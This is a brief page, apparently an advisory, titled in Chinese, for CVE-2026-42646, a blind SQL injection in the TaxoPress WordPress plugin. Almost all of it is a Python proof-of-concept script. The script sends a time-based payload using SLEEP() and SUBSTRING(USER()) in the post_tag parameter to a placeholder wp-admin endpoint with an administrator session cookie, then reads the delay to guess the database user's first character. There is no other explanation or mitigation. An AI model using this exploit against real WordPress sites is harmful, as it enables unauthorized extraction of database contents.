CVE-2026-42646: TaxoPress插件存在盲注漏洞

import requests import time # Proof of Concept for CVE-2026-42646 (Blind SQL Injection) # Note: This is a conceptual demonstration. Requires valid high-privileged session. target_url = "http://target-wordpress-site.com/wp-admin/admin.php" vulnerable_param = "post_tag" # Attacker's cookies (High privilege required, e.g., Administrator) cookies = { "wordpress_logged_in_xxx": "valid_admin_session_cookie" } # Payload template for Time-Based Blind SQL Injection # Checks if the first character of the database user is 'r' payload = "1' AND IF(SUBSTRING(USER(),1,1)='r', SLEEP(5), 0)-- -" params = { "page": "st_taxo", "action": "add", vulnerable_param: payload } try: print("[+] Sending malicious payload...") start_time = time.time() response = requests.get(target_url, params=params, cookies=cookies, timeout=10) end_time = time.time() elapsed_time = end_time - start_time if elapsed_time >= 5: print(f"[+] Vulnerability Confirmed! Response delay: {elapsed_time:.2f}s") print("[+] Database user likely starts with 'r'") else: print("[-] Payload did not trigger a delay or condition was false.") except Exception as e: print(f"Error occurred: {e}")